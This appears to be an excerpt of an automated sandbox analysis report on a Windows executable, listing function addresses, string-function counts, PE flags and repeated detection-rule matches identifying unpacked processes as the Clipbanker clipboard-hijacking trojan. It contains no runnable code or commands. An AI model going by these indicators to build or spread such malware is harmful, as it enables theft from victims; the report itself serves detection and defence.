Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_004C8113	1_2_004C8113
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_004021C0	1_2_004021C0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_004C9343	1_2_004C9343
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0044237E	1_2_0044237E
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00405447	1_2_00405447
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00405457	1_2_00405457
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_004084C0	1_2_004084C0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_004344FF	1_2_004344FF
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00449506	1_2_00449506
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0044B5B1	1_2_0044B5B1
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040A660	1_2_0040A660
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00409686	1_2_00409686
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0041E690	1_2_0041E690
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00406740	1_2_00406740
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00402750	1_2_00402750
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040A710	1_2_0040A710
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040F730	1_2_0040F730
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00408780	1_2_00408780
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0044D7A1	1_2_0044D7A1
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0042C804	1_2_0042C804
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00406880	1_2_00406880
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00481920	1_2_00481920
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0044D9DC	1_2_0044D9DC
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_004069F3	1_2_004069F3
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00449A71	1_2_00449A71
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00443B40	1_2_00443B40
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00402B80	1_2_00402B80
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00406B80	1_2_00406B80
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00409CF9	1_2_00409CF9
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0044ACFF	1_2_0044ACFF
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040DD40	1_2_0040DD40
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00427D6C	1_2_00427D6C
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040BDC0	1_2_0040BDC0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00409DFA	1_2_00409DFA
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0042CE51	1_2_0042CE51
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00406EE0	1_2_00406EE0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00409F76	1_2_00409F76
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00420F30	1_2_00420F30
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00449FE3	1_2_00449FE3
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF3520	3_2_05DF3520
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF7520	3_2_05DF7520
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E1D7F1	3_2_05E1D7F1
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DFA79A	3_2_05DFA79A
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DFC760	3_2_05DFC760
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DFE6E0	3_2_05DFE6E0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DFA699	3_2_05DFA699
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E3B69F	3_2_05E3B69F
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E1D1A4	3_2_05E1D1A4
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E3E141	3_2_05E3E141
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF9120	3_2_05DF9120
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF30F0	3_2_05DF30F0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E000D0	3_2_05E000D0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF70E0	3_2_05DF70E0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DFB0B0	3_2_05DFB0B0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E0F030	3_2_05E0F030
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DFB000	3_2_05DFB000
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DFA026	3_2_05DFA026
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF7393	3_2_05DF7393
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E3E37C	3_2_05E3E37C
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E722C0	3_2_05E722C0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF7220	3_2_05DF7220
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF5DF7	3_2_05DF5DF7
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF5DE7	3_2_05DF5DE7
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E32D1E	3_2_05E32D1E
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E24E9F	3_2_05E24E9F
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF8E60	3_2_05DF8E60
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF89D0	3_2_05DF89D0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF59F7	3_2_05DF59F7
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E1E9A3	3_2_05E1E9A3
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E1F9B0	3_2_05E1F9B0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DFA916	3_2_05DFA916
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E118D0	3_2_05E118D0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF7880	3_2_05DF7880
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DFDBE0	3_2_05DFDBE0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF2B60	3_2_05DF2B60
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E00B00	3_2_05E00B00
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF7A80	3_2_05DF7A80
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DFCA10	3_2_05DFCA10
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0042E003	4_2_0042E003
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040D240	4_2_0040D240
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0041E690	4_2_0041E690
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040F730	4_2_0040F730
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00481920	4_2_00481920
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00419F90	4_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D050	4_2_0050D050
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00405057	4_2_00405057
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040C070	4_2_0040C070
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0042F010	4_2_0042F010
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D008	4_2_0050D008
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00408030	4_2_00408030
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D028	4_2_0050D028
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_004070E0	4_2_004070E0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D090	4_2_0050D090
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D0A8	4_2_0050D0A8
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00410160	4_2_00410160
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_004C8113	4_2_004C8113
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_004021C0	4_2_004021C0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_004C9343	4_2_004C9343
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0044237E	4_2_0044237E
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00405447	4_2_00405447
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00405457	4_2_00405457
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_004084C0	4_2_004084C0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050C4E0	4_2_0050C4E0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_004344FF	4_2_004344FF
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00449506	4_2_00449506
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0044B5B1	4_2_0044B5B1
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040A660	4_2_0040A660
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00409686	4_2_00409686
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00406740	4_2_00406740
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00402750	4_2_00402750
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040A710	4_2_0040A710
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00408780	4_2_00408780
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0044D7A1	4_2_0044D7A1
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0042C804	4_2_0042C804
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00406880	4_2_00406880
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050C960	4_2_0050C960
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050C928	4_2_0050C928
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0044D9DC	4_2_0044D9DC
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_004069F3	4_2_004069F3
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050C988	4_2_0050C988
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050C9A8	4_2_0050C9A8
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00449A71	4_2_00449A71
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_004E1AB0	4_2_004E1AB0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00443B40	4_2_00443B40
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CB78	4_2_0050CB78
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00402B80	4_2_00402B80
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00406B80	4_2_00406B80
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00409CF9	4_2_00409CF9
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0044ACFF	4_2_0044ACFF
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040DD40	4_2_0040DD40
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CD60	4_2_0050CD60
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040BDC0	4_2_0040BDC0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CDF0	4_2_0050CDF0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00409DFA	4_2_00409DFA
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CE58	4_2_0050CE58
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0042CE51	4_2_0042CE51
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00406EE0	4_2_00406EE0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00409F76	4_2_00409F76
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00420F30	4_2_00420F30
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CF28	4_2_0050CF28
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CFC0	4_2_0050CFC0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00449FE3	4_2_00449FE3
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CF90	4_2_0050CF90

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 00428C81 appears 66 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 05E58EC0 appears 57 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 00420EC2 appears 40 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 05E60160 appears 49 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 05E18EC0 appears 57 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 05E20160 appears 49 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 004547A0 appears 64 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 00422587 appears 48 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 0042F7C0 appears 129 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 0044F23E appears 108 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 00428520 appears 125 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 00450870 appears 52 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 00454E50 appears 62 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 00441A25 appears 44 times
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: String function: 0044F26C appears 41 times

Source: mJVVW85CnW.exe, 00000000.00000000.1686465121.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs mJVVW85CnW.exe
Source: mJVVW85CnW.exe, 00000001.00000000.1689862193.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs mJVVW85CnW.exe
Source: mJVVW85CnW.exe, 00000001.00000003.1704697492.0000000002F71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFires( vs mJVVW85CnW.exe
Source: mJVVW85CnW.exe, 00000003.00000000.1708511810.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs mJVVW85CnW.exe
Source: mJVVW85CnW.exe, 00000004.00000003.1879175564.00000000031C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: System.OriginalFileName vs mJVVW85CnW.exe
Source: mJVVW85CnW.exe, 00000004.00000000.1711656275.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs mJVVW85CnW.exe
Source: mJVVW85CnW.exe, 00000004.00000003.1879893142.00000000031C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: System.OriginalFileName vs mJVVW85CnW.exe
Source: mJVVW85CnW.exe, 00000005.00000002.1724414267.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFires( vs mJVVW85CnW.exe
Source: mJVVW85CnW.exe, 00000006.00000000.1720232250.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFires( vs mJVVW85CnW.exe

Source: mJVVW85CnW.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 32.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 25.2.mstsca.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.mstsca.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 12.2.build3.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 12.2.build3.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.24215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.24215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.24215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.24215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
